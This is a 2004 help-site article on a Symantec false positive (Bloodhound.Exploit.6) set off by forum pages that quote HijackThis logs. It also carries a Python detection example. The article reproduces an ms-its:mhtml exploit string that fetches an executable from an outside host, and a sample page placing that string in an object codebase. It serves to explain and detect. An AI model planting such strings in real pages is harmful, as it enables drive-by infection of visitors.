Bloodhound.Exploit.6 False Positive found by Antivirus in Forums and Hijack Logs

Contributed by davak, December 7, 2004
Tagged: Windows spyware

Symantec antivirus will raise a common false positive when a web page contains a particular piece of text. That text is common in HijackThis logs. This recipe explains and reproduces the false positive.


If you are running Symantec antivirus, this page may give you a false positive. If you post a comment, it will very likely give you a false positive. Don’t worry. You are safe. Keep reading for the explanation.

In fact, it’ll probably say something like this:

Scan type: Realtime Protection Scan
Event: Virus Found!
Virus name: Bloodhound.Exploit.6
File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D14Q0F5Z\admin[1].htm
Location: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D14Q0F5Z
Computer: 5XBBT01
User: Administrator
Action taken: Clean failed : Quarantine failed : Access denied
Date found: Tuesday, December 07, 2004 11:18:39 AM

This scanner is picking up this text and giving a false positive:

O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://c:\nosuch.mht!http://2awm.com/pop/chm/sextxsp.chm::/on-line. exe

This text is often seen in Bloodhound.Exploit.6 infections. The confusion arises when text like this is posted in forums while trying to clean infections on other systems: the scanner matches the string in the cached copy of the forum page, not an actual exploit.

This is very commonly seen in forums where HijackThis logs from infected machines are posted.
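To show why a scanner behaves this way, here is an added example (not code from the original recipe or from Symantec): a naive substring signature fires on any page that merely quotes the ms-its:mhtml string, while a context-aware check only alerts when the string sits in an HTML attribute that would actually make the browser load it. The exact substring Symantec keys on is not stated on the page, so `SIGNATURE` is an assumption modelled on the O16 line above; the sample pages and the host `chm.example.invalid` are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser

# Assumed signature core, modelled on the O16 line quoted above; the real
# Symantec pattern is not known from the page.
SIGNATURE = re.compile(r"ms-its:mhtml:file://", re.IGNORECASE)

# HTML elements whose attributes cause the browser to fetch a URL without a click.
ACTIVE_ATTRS = {
    "object": {"codebase", "data"},
    "embed": {"src"},
    "iframe": {"src"},
    "frame": {"src"},
    "script": {"src"},
    "meta": {"content"},  # http-equiv refresh
}


def naive_scan(page: str) -> bool:
    """Plain substring signature: matches the string anywhere in the page,
    including a HijackThis log quoted inside a forum post."""
    return SIGNATURE.search(page) is not None


class _ContextParser(HTMLParser):
    """Separates matches in loadable attributes from matches in visible text."""

    def __init__(self):
        super().__init__()
        self.active_hits = []  # signature inside an attribute that loads content
        self.text_hits = []    # signature inside text nodes (e.g. a quoted log line)

    def handle_starttag(self, tag, attrs):
        wanted = ACTIVE_ATTRS.get(tag.lower(), set())
        for name, value in attrs:
            if value and name.lower() in wanted and SIGNATURE.search(value):
                self.active_hits.append((tag, name, value))

    def handle_data(self, data):
        if SIGNATURE.search(data):
            self.text_hits.append(data.strip())


def context_scan(page: str) -> dict:
    """Alert only when the string is in a position the browser would act on;
    text-only matches are reported as informational."""
    parser = _ContextParser()
    parser.feed(page)
    parser.close()
    return {
        "alert": bool(parser.active_hits),
        "active_hits": parser.active_hits,
        "text_hits": parser.text_hits,
    }


# Constructed sample: a forum post quoting a HijackThis log line (host is a placeholder).
FORUM_POST = """<html><body><div class="post">
<p>Here is my HijackThis log:</p>
<pre>O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://c:\\nosuch.mht!http://chm.example.invalid/bad.chm::/file.exe</pre>
</div></body></html>"""

# Constructed sample: the same string in an object codebase, which is what an
# O16 (Downloaded Program Files) entry actually refers to.
DPF_PAGE = """<html><body>
<object codebase="ms-its:mhtml:file://c:\\nosuch.mht!http://chm.example.invalid/bad.chm::/file.exe"></object>
</body></html>"""

if __name__ == "__main__":
    for label, page in (("forum post", FORUM_POST), ("DPF page", DPF_PAGE)):
        print(label, "naive:", naive_scan(page), "context:", context_scan(page)["alert"])
```

Both samples trip `naive_scan`, which is the behaviour the recipe describes; `context_scan` leaves the forum post as a text-only (informational) hit and alerts only on the page where the string is in a loadable attribute.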

This is a false positive. Your system is not infected.
